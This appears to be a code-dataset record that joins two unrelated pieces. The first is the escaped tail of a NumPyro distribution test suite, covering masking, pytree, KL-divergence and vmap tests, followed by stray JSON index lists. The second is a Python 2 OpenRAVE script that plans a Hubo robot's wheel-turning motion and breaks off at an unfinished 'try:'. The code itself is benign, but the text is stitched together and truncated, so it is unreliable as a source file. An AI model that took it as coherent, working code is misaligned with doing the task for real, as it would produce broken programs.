mask = bool(mask)\n samples = jax_dist.sample(random.PRNGKey(1))\n actual = jax_dist.mask(mask).log_prob(samples)\n assert_allclose(\n actual != 0,\n jnp.broadcast_to(mask, lax.broadcast_shapes(batch_shape, mask_shape)),\n )\n\n\[email protected](\"event_shape\", [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(\n jnp.isfinite(data), tuple(-i - 1 for i in range(len(event_shape)))\n )\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[: len(data.shape) - len(event_shape)]\n return log_prob.sum()\n\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_dist_pytree(jax_dist, sp_dist, params):\n def f(x):\n return jax_dist(*params)\n\n if jax_dist is _ImproperWrapper:\n pytest.skip(\"Cannot flattening ImproperUniform\")\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama doesn't define flatten/unflatten\")\n jax.jit(f)(0) # this test for flatten/unflatten\n lax.map(f, np.ones(3)) # this test for compatibility w.r.t. scan\n # Test that parameters do not change after flattening.\n expected_dist = f(0)\n actual_dist = jax.jit(f)(0)\n expected_sample = expected_dist.sample(random.PRNGKey(0))\n actual_sample = actual_dist.sample(random.PRNGKey(0))\n expected_log_prob = expected_dist.log_prob(expected_sample)\n actual_log_prob = actual_dist.log_prob(actual_sample)\n assert_allclose(actual_sample, expected_sample, rtol=1e-6)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-6)\n\n\[email protected](\n \"method, arg\", [(\"to_event\", 1), (\"mask\", False), (\"expand\", [5])]\n)\ndef test_special_dist_pytree(method, arg):\n def f(x):\n d = dist.Normal(np.zeros(1), np.ones(1))\n return getattr(d, method)(arg)\n\n jax.jit(f)(0)\n lax.map(f, np.ones(3))\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n # ExpandedDistribution can mutate the `batch_shape` of\n # its base distribution in order to make ExpandedDistribution\n # mappable, see #684. However, this mutation should not take\n # place if no mapping operation is performed.\n\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n # Low level test: ensure that (tree_flatten o tree_unflatten)(expanded_dist)\n # amounts to an identity operation.\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n # High-level test: `jax.jit`ting a function returning an ExpandedDistribution\n # (which involves an instance of the low-level case as it will transform\n # the original function by adding some flattening and unflattening steps)\n # should return same object as its non-jitted equivalent.\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected](\"batch_shape\", [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected](\"batch_shape\", [(), (4,), (2, 3)], ids=str)\[email protected](\"event_shape\", [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(\n dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))\n )\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected](\"batch_shape\", [(), (4,), (2, 3)], ids=str)\[email protected](\"event_shape\", [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(shape)\n q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(shape)\n actual = kl_divergence(\n dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))\n )\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected](\"shape\", [(), (4,), (2, 3)], ids=str)\[email protected](\n \"p_dist, q_dist\",\n [\n (dist.Beta, dist.Beta),\n (dist.Gamma, dist.Gamma),\n (dist.Kumaraswamy, dist.Beta),\n (dist.Normal, dist.Normal),\n (dist.Weibull, dist.Gamma),\n ],\n)\ndef test_kl_univariate(shape, p_dist, q_dist):\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f\"Missing pattern for param {k}.\")\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected](\"shape\", [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10_000,)).copy()\n expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n # test that vmapped binomial with p = 0 does not have an infinite loop\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\ndef _get_vmappable_dist_init_params(jax_dist):\n if jax_dist.__name__ == (\"_TruncatedCauchy\"):\n return [2, 3]\n elif jax_dist.__name__ == (\"_TruncatedNormal\"):\n return [2, 3]\n elif issubclass(jax_dist, dist.Distribution):\n init_parameters = list(inspect.signature(jax_dist.__init__).parameters.keys())[\n 1:\n ]\n vmap_over_parameters = list(\n inspect.signature(vmap_over.dispatch(jax_dist)).parameters.keys()\n )[1:]\n return list(\n [\n i\n for i, name in enumerate(init_parameters)\n if name in vmap_over_parameters\n ]\n )\n else:\n raise ValueError\n\n\ndef _allclose_or_equal(a1, a2):\n if isinstance(a1, np.ndarray):\n return np.allclose(a2, a1)\n elif isinstance(a1, jnp.ndarray):\n return jnp.allclose(a2, a1)\n elif isinstance(a1, csr_matrix):\n return np.allclose(a2.todense(), a1.todense())\n else:\n return a2 == a1 or a2 is a1\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[: len(params)]\n\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n\n d = make_jax_dist(*params)\n\n if isinstance(d, _SparseCAR) and d.is_sparse:\n # In this case, since csr arrays are not jittable,\n # _SparseCAR has a csr_matrix as part of its pytree\n # definition (not as a pytree leaf). This causes pytree\n # operations like tree_map to fail, since these functions\n # compare the pytree def of each of the arguments using ==\n # which is ambiguous for array-like objects.\n return\n\n in_out_axes_cases = [\n # vmap over all args\n (\n tuple(0 if i in vmappable_param_idxs else None for i in range(len(params))),\n 0,\n ),\n # vmap over a single arg, out over all attributes of a distribution\n *(\n ([0 if i == idx else None for i in range(len(params))], 0)\n for idx in vmappable_param_idxs\n if params[idx] is not None\n ),\n # vmap over a single arg, out over the associated attribute of the distribution\n *(\n (\n [0 if i == idx else None for i in range(len(params))],\n vmap_over(d, **{param_names[idx]: 0}),\n )\n for idx in vmappable_param_idxs\n if params[idx] is not None\n ),\n # vmap over a single arg, axis=1, (out single attribute, axis=1)\n *(\n (\n [1 if i == idx else None for i in range(len(params))],\n vmap_over(d, **{param_names[idx]: 1}),\n )\n for idx in vmappable_param_idxs\n if isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).ndim > 0\n # skip this distribution because _GeneralMixture.__init__ turns\n # 1d inputs into 0d attributes, thus breaks the expectations of\n # the vmapping test case where in_axes=1, only done for rank>=1 tensors.\n and jax_dist is not _GeneralMixture\n ),\n ]\n\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [\n jax.tree_map(lambda x: jnp.expand_dims(x, ax), arg)\n if isinstance(ax, int)\n else arg\n for arg, ax in zip(params, in_axes)\n ]\n # Recreate the jax_dist to avoid side effects coming from `d.sample`\n # triggering lazy_property computations, which, in a few cases, break\n # vmap_over's expectations regarding existing attributes to be vmapped.\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes)(\n *batched_params\n )\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d\n )\n assert eq == jnp.array([True])\n\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10).sample(\n key\n )\n\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-6)\n\n\ndef test_normal_log_cdf():\n # test if log_cdf method agrees with jax.scipy.stats.norm.logcdf\n # and if exp(log_cdf) agrees with cdf\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-6)\n\n\[email protected](\n \"value\",\n [\n -15.0,\n jnp.array([[-15.0], [-10.0], [-5.0]]),\n jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]]),\n ],\n)\ndef test_truncated_normal_log_prob_in_tail(value):\n # define set of distributions truncated in tail of distribution\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = (-20, -1.0)\n a, b = (low - loc) / scale, (high - loc) / scale # rescale for jax input\n\n numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high).log_prob(\n value\n )\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n # test, if samples from distributions truncated in\n # tail of distribution returns any inf's\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10_000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-ids": [
97,
100,
123,
125,
137
]
}
|
[
97,
100,
123,
125,
137
] |
#!/usr/bin/env python
# Ben Suay, RAIL
# May 2013
# Worcester Polytechnic Institute
#
# http://openrave.org/docs/latest_stable/command_line_tools/
# openrave-robot.py /your/path/to/your.robot.xml --info=joints
# On that page you can find more examples on how to use openrave-robot.py.
from openravepy import *
import sys
if not __openravepy_build_doc__:
from openravepy import *
from numpy import *
import numpy
import time
from rodrigues import *
from TransformMatrix import *
from str2num import *
from TSR import *
from math import *
from copy import *
import os # for file operations
from RaveCBiRRT import *
from base_wheel_turning import *
class HuboPlusWheelTurning( BaseWheelTurning ):
def __init__(self,
HuboModelPath = '../../openHubo/huboplus/rlhuboplus.robot.xml',
WheelModelPath = '../../../drc_common/models/driving_wheel.robot.xml' ):
BaseWheelTurning.__init__( self, HuboModelPath, WheelModelPath )
# Set those variables to show or hide the interface
# Do it using the member functions
self.StopAtKeyStrokes = False
self.ShowUserInterface = False
self.ViewerStarted = False
# Right Hand Joints
# Open - Closed Values
self.rhanddofs = range(27,42)
self.rhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]
self.rhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]
# Left Hand Joints
self.lhanddofs = range(42,57)
self.lhandclosevals = [0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0.439, 0.683, 0.497, 0, 0, 1.2]
self.lhandopenvals = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08]
def SetRobotConfiguration(self,jointValues):
print "SetRobotConfiguration"
values = []
values.append( jointValues['HPY'] ) # 0
values.append( jointValues['RHY'] ) # 1
values.append( jointValues['LHY'] ) # 2
values.append( jointValues['RHR'] ) # 3
values.append( jointValues['HPY'] ) # 4
values.append( jointValues['LHR'] ) # 5
values.append( jointValues['LHP'] ) # 6
values.append( jointValues['RKP'] ) # 7
values.append( jointValues['LKP'] ) # 8
values.append( jointValues['RAP'] ) # 9
values.append( jointValues['LAP'] ) # 10
values.append( jointValues['RAR'] ) # 11
values.append( jointValues['LAR'] ) # 12
values.append( jointValues['RSP'] ) # 13
values.append( jointValues['LSP'] ) # 14
values.append( jointValues['RSR'] ) # 15
values.append( jointValues['LSR'] ) # 16
values.append( jointValues['RSY'] ) # 17
values.append( jointValues['LSY'] ) # 18
values.append( jointValues['REP'] ) # 19
values.append( jointValues['LEP'] ) # 20
values.append( jointValues['RWY'] ) # 21
values.append( jointValues['LWY'] ) # 22
values.append( jointValues['RWP'] ) # 23
values.append( jointValues['LWP'] ) # 24
values.append( jointValues['HNR'] ) # 25
values.append( jointValues['HNP'] ) # 26
for i in range(27,57):
values.append(0)
# values.append( jointValues['rightIndexKnuckle2'] ) # 27
# values.append( jointValues['rightIndexKnuckle3'] ) # 28
# values.append( jointValues['rightIndexKnuckle1'] ) # 29
# values.append( jointValues['rightMiddleKnuckle2'] ) # 30
# values.append( jointValues['rightMiddleKnuckle3'] ) # 31
# values.append( jointValues['rightMiddleKnuckle1'] ) # 32
# values.append( jointValues['rightRingKnuckle2'] ) # 33
# values.append( jointValues['rightRingKnuckle3'] ) # 34
# values.append( jointValues['rightRingKnuckle1'] ) # 35
# values.append( jointValues['rightPinkyKnuckle2'] ) # 36
# values.append( jointValues['rightPinkyKnuckle3'] ) # 37
# values.append( jointValues['rightPinkyKnuckle1'] ) # 38
# values.append( jointValues['rightThumbKnuckle2'] ) # 39
# values.append( jointValues['rightThumbKnuckle3'] ) # 40
# values.append( jointValues['rightThumbKnuckle1'] ) # 41
# values.append( jointValues['leftIndexKnuckle2'] ) # 42
# values.append( jointValues['leftIndexKnuckle3'] ) # 43
# values.append( jointValues['leftIndexKnuckle1'] ) # 44
# values.append( jointValues['leftMiddleKnuckle2'] ) # 45
# values.append( jointValues['leftMiddleKnuckle3'] ) # 46
# values.append( jointValues['leftMiddleKnuckle1'] ) # 47
# values.append( jointValues['leftRingKnuckle2'] ) # 48
# values.append( jointValues['leftRingKnuckle3'] ) # 49
# values.append( jointValues['leftRingKnuckle1'] ) # 50
# values.append( jointValues['leftPinkyKnuckle2'] ) # 51
# values.append( jointValues['leftPinkyKnuckle3'] ) # 52
# values.append( jointValues['leftPinkyKnuckle1'] ) # 53
# values.append( jointValues['leftThumbKnuckle2'] ) # 54
# values.append( jointValues['leftThumbKnuckle3'] ) # 55
# values.append( jointValues['leftThumbKnuckle1'] ) # 56
self.robotid.SetDOFValues( values )
def Run(self):
self.RemoveFiles()
# This is a list of handles of the objects that are
# drawn on the screen in OpenRAVE Qt-Viewer.
# Keep appending to the end, and pop() if you want to delete.
handles = []
normalsmoothingitrs = 150;
fastsmoothingitrs = 20;
self.StartViewerAndSetWheelPos( handles )
# Wheel Joint Index
crankjointind = 0
# Set the wheel joints back to 0 for replanning
self.crankid.SetDOFValues([0],[crankjointind])
self.crankid.GetController().Reset(0)
manips = self.robotid.GetManipulators()
crankmanip = self.crankid.GetManipulators()
try:
cbirrtHubo = RaveCBiRRT(self.env,'rlhuboplus')
cbirrtWheel = RaveCBiRRT(self.env,'crank')
except openrave_exception, e:
print e
return []
# Keep Active Joint Indices
# Note that 0 is the driving wheel
#activedofs = [0]
activedofs = []
for m in manips:
# print m.GetArmIndices()
activedofs.extend(m.GetArmIndices())
# Sort Active Joint Indices
activedofs.sort()
#print activedofs
# Set Elbows and Thumbs Joint Values
self.robotid.SetDOFValues([-0.95,-0.95,1,1],[19,20,41,56])
self.robotid.SetActiveDOFs(activedofs)
# Current configuration of the robot is its initial configuration
initconfig = self.robotid.GetActiveDOFValues()
print "robot init config : "
print initconfig
# List of Robot Links
links = self.robotid.GetLinks()
# List of Wheel (Crank Links)
cranklinks = self.crankid.GetLinks()
# End Effector Transforms
Tee = []
for i in range(len(manips)):
# Returns End Effector Transform in World Coordinates
Tlink = manips[i].GetEndEffectorTransform()
Tee.append(Tlink)
# Get Transformation Matrix for the Wheel
# Note that crank's links are not rotated
# If you want use the wheel's end effector's transformation
# matrix (which is 23 degrees tilted) then see
# CTee matrix below.
#
# crank has two links:
# 0) pole - the blue cylinder in the model, and,
# 1) crank - the driving wheel itself.
jointtm = cranklinks[0].GetTransform()
# handles.append(misc.DrawAxes(env,matrix(jointtm),1))
# We can also get the transformation matrix
# with the following command as a string
jointtm_str = cbirrtHubo.solve('GetJointTransform name crank jointind '+str(crankjointind))
# And then we can convert the string to a 1x12 array
jointtm_str = jointtm_str.replace(" ",",")
jointtm_num = eval('['+jointtm_str+']')
# In this script we will use jointtm.
# jointtm_str and jointtm_num are given as example.
# Crank Transform End Effector in World Coordinates
# This is the transformation matrix of the end effector
# named "dummy" in the xml file.
# Note that dummy is tilted 23 degress around its X-Axis
CTee = crankmanip[0].GetEndEffectorTransform()
tilt_angle_deg = acos(dot(linalg.inv(CTee),jointtm)[1,1])*180/pi
tilt_angle_rad = acos(dot(linalg.inv(CTee),jointtm)[1,1])
# Center of Gravity Target
cogtarg = [-0.05, 0.085, 0]
#if self.ShowUserInterface :
#cogtm = MakeTransform(rodrigues([0,0,0]),transpose(matrix(cogtarg)))
#handles.append(misc.DrawAxes(self.env,cogtm,1))
# polyscale: changes the scale of the support polygon
# polytrans: shifts the support polygon around
footlinknames = ' Body_RAR Body_LAR polyscale 0.5 0.5 0 polytrans -0.015 0 0 '
#footlinknames = ' Body_RAR Body_LAR polyscale 0.7 0.5 0 polytrans -0.015 0 0 '
#footlinknames = ' Body_RAR Body_LAR polyscale 1.0 1.0 0 polytrans 0 0 0 '
# What is this?
handrot = rodrigues([0,-pi/2,0])
# Translation Offset from the wheel center for the hands
transoffset = [0, 0.15, 0];
# Figure out where to put the left hand on the wheel
temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))
temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))
# Left Hand Pose in World Coordinates
T0_LH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,0.15,0]))))
# Uncomment if you want to see where T0_LH1 is
# handles.append(misc.DrawAxes(env,matrix(T0_LH1),1))
# Figure out where to put the right hand on the wheel
temp = dot(CTee, MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0]))))
temp = dot(temp, MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0]))))
# Right Hand Pose in World Coordinates
T0_RH1 = dot(temp, MakeTransform(rodrigues([0,0,0]),transpose(matrix([0,-0.15,0]))))
# Uncomment if you want to see where T0_RH1 is
# handles.append(misc.DrawAxes(env,matrix(T0_RH1),1))
# Define Task Space Region strings
# Left Hand
TSRString1 = SerializeTSR(0,'NULL',T0_LH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Right Hand
TSRString2 = SerializeTSR(1,'NULL',T0_RH1,eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Left Foot
TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Head
# Grasp transform in Head coordinates
Tw0_eH = eye(4)
# How much freedom do we want to give to the Head
# [x,x,y,y,z,z,R,R,P,P,Y,Y]
Bw0H = matrix([0,0,-0.1,0.1,-0.1,0.01,0,0,0,0,0,0])
TSRString4 = SerializeTSR(4,'NULL',Tee[4],Tw0_eH,Bw0H)
# We defined Task Space Regions. Now let's concatenate them.
TSRChainStringGrasping = SerializeTSRChain(0,1,0,1,TSRString1,'NULL',[])+' '+SerializeTSRChain(0,1,0,1,TSRString2,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString3,'NULL',[])+' '+SerializeTSRChain(0,1,1,1,TSRString4,'NULL',[])
if( self.StopAtKeyStrokes ):
print "Press Enter to plan initconfig --> startik"
sys.stdin.readline()
# Get a trajectory from initial configuration to grasp configuration
with self.robotid:
try:
answer = cbirrtHubo.solve('RunCBiRRT psample 0.2 supportlinks 2 '+footlinknames+' smoothingitrs '+str(normalsmoothingitrs)+' '+TSRChainStringGrasping)
print "RunCBiRRT answer: ",str(answer)
except openrave_exception, e:
print "Cannot send command RunCBiRRT: "
print e
return []
try:
os.rename("cmovetraj.txt","movetraj0.txt")
except OSError, e:
# No file cmovetraj
print e
return []
# The following is the same as commented out try-except section
traj = RaveCreateTrajectory(self.env,'').deserialize(open('movetraj0.txt','r').read())
self.robotid.GetController().SetPath(traj)
self.robotid.WaitForController(0)
self.robotid.GetController().Reset(0)
# Reset(0) releases the controller, otherwise after calling
# SetPath the robot controller actively holds the trajectory's final joint values
# Instead of 4 lines above, we could use the following block
# to play the trajectory
#
# try:
# answer= cbirrtHubo.solve('traj movetraj0.txt');
# robotid.WaitForController(0)
# sys.stdin.readline()
# # debug
# print "traj call answer: ",str(answer)
# except openrave_exception, e:
# print e
# Get the current configuration of the robot
# and assign it to startik (start of the wheel
# rotation path).
startik = self.robotid.GetActiveDOFValues()
# Left Hand's index is less than the right hand.
# Hence it is evaluated first by the CBiRRT Module.
# That's why We need to define the right hand's
# transform relative to the wheel (ask Dmitry Berenson
# about this for more information).
temp1 = MakeTransform(rodrigues([-pi/2,0,0]),transpose(matrix([0,0,0])))
temp2 = MakeTransform(rodrigues([0,0,-pi/2]),transpose(matrix([0,0,0])))
# Rotate the wheel's transform to a suitable pose
# for the Left Hand
# T0_w0L stands for:
# left hand's transform on wheel in world coordinates
T0_w0L = dot(dot(CTee,temp1),temp2)
# This is what's happening:
#
# Tw0L_0 = linalg.inv(T0_w0L)
# Tw0L_LH1 = Tw0L_0*T0_LH1
#
# Left hand's transform in wheel's coordinates
Tw0L_LH1 = dot(linalg.inv(T0_w0L),T0_LH1)
# Transform of the left hand's end effector in wheel's coords.
# Required by CBiRRT
Tw0_eL = Tw0L_LH1
# How much freedom do we want to give to the left hand
Bw0L = matrix([0,0,0,0,0,0,0,pi,0,0,0,0])
# Right Hand's transforms:
T0_crankcrank = self.crankid.GetManipulators()[0].GetTransform()
T0_w0R = MakeTransform(rodrigues([tilt_angle_rad,0,0]),transpose(matrix([0,0,0])))
# End effector transform in wheel coordinates
Tw0_eR = dot(linalg.inv(T0_crankcrank),T0_RH1)
#handles.append(misc.DrawAxes(env,matrix(Tw0_eR),1))
# How much freedom? (note: in frame of crank)
Bw0R = matrix([0,0,0,0,0,0,0,0,0,0,0,0])
# Head's transforms:
T0_w0H = Tee[4]
Tw0_eH = eye(4);
Bw0H = matrix([-0.05,0.05,-0.1,0.1,-100,100,-pi,pi,-pi,pi,-pi,pi])
# Define Task Space Regions
# Left Hand
TSRString1 = SerializeTSR(0,'NULL',T0_w0L,Tw0_eL,Bw0L)
# Right Hand
TSRString2 = SerializeTSR(1,'crank crank',T0_w0R,Tw0_eR,Bw0R)
# Left Foot
TSRString3 = SerializeTSR(2,'NULL',Tee[2],eye(4),matrix([0,0,0,0,0,0,0,0,0,0,0,0]))
# Head
TSRString4 = SerializeTSR(4,'NULL',T0_w0H,Tw0_eH,Bw0H)
TSRChainStringFootOnly = SerializeTSRChain(0,0,1,1,TSRString3,'NULL',[])
TSRChainStringFootandHead = TSRChainStringFootOnly+' '+SerializeTSRChain(0,0,1,1,TSRString4,'NULL',[])
TSRChainStringTurning = SerializeTSRChain(0,0,1,1,TSRString1,'crank',matrix([crankjointind]))+' '+SerializeTSRChain(0,0,1,1,TSRString2,'NULL',[])+' '+TSRChainStringFootandHead
# Calculate hand transforms after rotating the wheel (they will help us find the goalik):
# How much do we want to rotate the wheel?
crank_rot = pi/6.5
# Which joint do we want the CBiRRT to mimic the TSR for?
TSRChainMimicDOF = 1
# Create the transform for the wheel that we would like to reach to
Tcrank_rot = MakeTransform(rodrigues([crank_rot,0,0]),transpose(matrix([0,0,0])))
# What is this?
temp = MakeTransform(rodrigues([0,0,crank_rot]),transpose(matrix([0,0,0])))
# Rotate the left hand's transform on the wheel in world transform "crank_rot" radians around it's Z-Axis
T0_cranknew = dot(T0_w0L,Tcrank_rot)
# Where will the left hand go after turning the wheel?
# This is what's happening:
#
# Tcranknew_LH2 = dot(Tw0L_0,T0_LH1) --> Left hand in wheel's coordinate
# T0_LH2 = dot(T0_cranknew,Tcranknew_LH2) --> Left hand rotated around wheel's origin
T0_LH2 = dot(T0_cranknew,dot(linalg.inv(T0_w0L),T0_LH1))
# Uncomment to see T0_LH2
# handles.append(misc.DrawAxes(env,matrix(T0_LH2),1))
# Where will the right hand go after turning the wheel?
T0_RH2 = dot(T0_crankcrank,dot(temp,dot(linalg.inv(T0_crankcrank),T0_RH1)))
# Uncomment to see T0_RH2
# handles.append(misc.DrawAxes(env,matrix(T0_RH2),1))
arg1 = str(cogtarg).strip("[]").replace(', ',' ')
arg2 = trans_to_str(T0_LH2)
arg3 = trans_to_str(T0_RH2)
arg4 = trans_to_str(Tee[2])
# print arg1
# print arg2
# print arg3
# print arg4
if( self.StopAtKeyStrokes ):
print "Press Enter to find a goalIK"
sys.stdin.readline()
self.crankid.SetDOFValues([crank_rot],[crankjointind])
goalik = cbirrtHubo.solve('DoGeneralIK exec supportlinks 2 '+footlinknames+' movecog '+arg1+' nummanips 3 maniptm 0 '+arg2+' maniptm 1 '+arg3+' maniptm 2 '+arg4)
# print "goalIK"
# print goalik
self.robotid.SetActiveDOFValues(str2num(goalik))
self.crankid.SetDOFValues([crank_rot],[crankjointind])
if( self.StopAtKeyStrokes ):
print "Press Enter to go to startik"
sys.stdin.readline()
# Get a trajectory from goalik to grasp configuration
goaljoints = deepcopy(goalik)
for i in range(TSRChainMimicDOF):
goaljoints += ' 0'
goaljoints = str2num(goaljoints)
self.robotid.SetActiveDOFValues(startik)
time.sleep(0.5)
self.robotid.SetDOFValues(self.rhandclosevals,self.rhanddofs)
self.robotid.SetDOFValues(self.lhandclosevals,self.lhanddofs)
# Close hands to start "turning" the wheel
self.crankid.SetDOFValues([0],[crankjointind])
time.sleep(0.5)
if( self.StopAtKeyStrokes ):
print "Press Enter to plan startik --> goalik (DMITRY!!!)"
sys.stdin.readline()
print self.robotid.GetActiveDOFValues()
print TSRChainStringTurning
try:
